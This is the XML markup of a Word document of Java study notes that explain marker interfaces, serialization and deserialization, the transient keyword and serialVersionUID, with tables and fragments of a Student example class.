        </w:rPr>
        <w:t xml:space="preserve"> is an interface that has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no methods or fields</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Its sole purpose is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mark</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a class with some metadata so that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM or framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can identify and treat the object differently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0DD92E"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7CA9304"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76B8E0"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methods inside — it's a marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E75CA1" w14:textId="444886AD"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624F70"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If a class implements Serializable, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>indicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that objects of that class can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (converted into a byte stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368E61D1"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E4B95" w14:paraId="4A5B6B6D" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="588F34F0"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Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08EEC07F"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="388CA1DF" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="303523A5"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Serializable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01A52BC4"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arks objects that can be serialized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="3FF8556E" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="062AAD2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loneable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E42490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llows object cloning using Object.clone()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="7D5A191A" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34F2262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Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48AF04D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Used in RMI to indicate remote method calling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="4584F74D" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0481E89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ThreadSafe (custom)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06C4C3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be used to tag thread-safe components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="191023C2"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Does It Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65939AF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Although a marker interface has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Java libraries and JVM use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instanceof checks or reflection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to apply behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111DF728"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9F64E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fe to serialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44F142" w14:textId="6BB0083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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970E3E4"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Marker Interface Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A00C8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rker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770DFB59"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7070C7"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ansac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36E6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usiness logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9ACAC3" w14:textId="61FDD9F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1552AC1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 framework might look for Auditable-tagged classes and log changes automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA095FF"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E4B95" w14:paraId="6ED951DE" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19E38364"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8344CCC"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Marker Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1973142A"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r>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="19F75EB9" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22269DD9"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troduced in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E824C6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1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27B9B23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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="25A5AFD2" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41F9982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heritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F4EEBCF"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use instanceof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B91D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not use instanceof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="0DA58627" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6056E28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Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="003C593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Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2636569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ore flexible (can include data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="215DAABD" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2218421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Preferred now?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17AD120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ld style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65985E1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Recommended (modern approach)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="216BD21B"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1E88ACF"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Marker interfaces = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empty interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mark classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for special treatment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01222741"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used (e.g., Serializable), but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations are more powerful and flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> today</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F81EB5" w14:textId="01D849D0" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="009A6E11">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc197867224"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is serialization and deserialization</w:t>
      </w:r>
      <w:r w:rsidR="00E9672A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="12AEBBA4" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00460B80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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Serialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54614E1B" w14:textId="7E5B350E"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b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Serialization is the process of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>converting a Java object into a byte stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, so it can be stored in a file, sent over a network, or saved in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE3F3F" w14:textId="3620D37B"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Why?</w:t>
      </w:r>
      <w:r w:rsidR="004F3461" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>To persist (save) the state of an object or transfer it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD1AC5"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4251CAA8"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660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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56D858D6"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bject must be Serializable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0025D" w14:textId="32EAEBF2"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0E297827"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Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756365D8"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lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Deserialization is the reverse process — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>reconstructing a Java object from a byte stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0147032A"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6152334F"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29873717"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MyObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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514F8EE1" w14:textId="03778E9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63B74251"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quirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE20EB"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The class </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>must implement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>java.io.Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1E536"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21ED9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CA3DB4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520C39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4FCF8B6"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7DE2B1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12719E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1A380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structors, getters, setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3252DD40" w14:textId="16CF9752"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6540A45"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al-World Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CEB56"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aving user session data to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D06A7"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ending objects between systems (e.g., via sockets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0375084B"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Caching objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCBCDA2"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toring objects in databases as BLOBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C9606"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Things to Watch Out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5A135" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:num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transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword skips fields during serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A14BF7" w14:textId="6E76777A"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password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FFD2B4" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Version conflicts can happen — use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>serialVersionUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> for version control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F8EF4" w14:textId="434A0C11"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56A745A"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Simple Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195FD5C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Serializable class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9918A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68544F1B"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6BA9B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5B4C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F92444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9525514"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69688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7F9C5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14F3A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2D4EF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DF47EB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AE8A2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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799016D" w14:textId="6D5624BC"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Main class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8619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t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24405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C4E7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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC45E2"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6B41AEF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1241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4532B71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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A799D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9C4CF4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E5197C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38D98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0EFEE6C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63E7C04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836B95A" w14:textId="1CCC23A8"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eserialized Stude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ge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
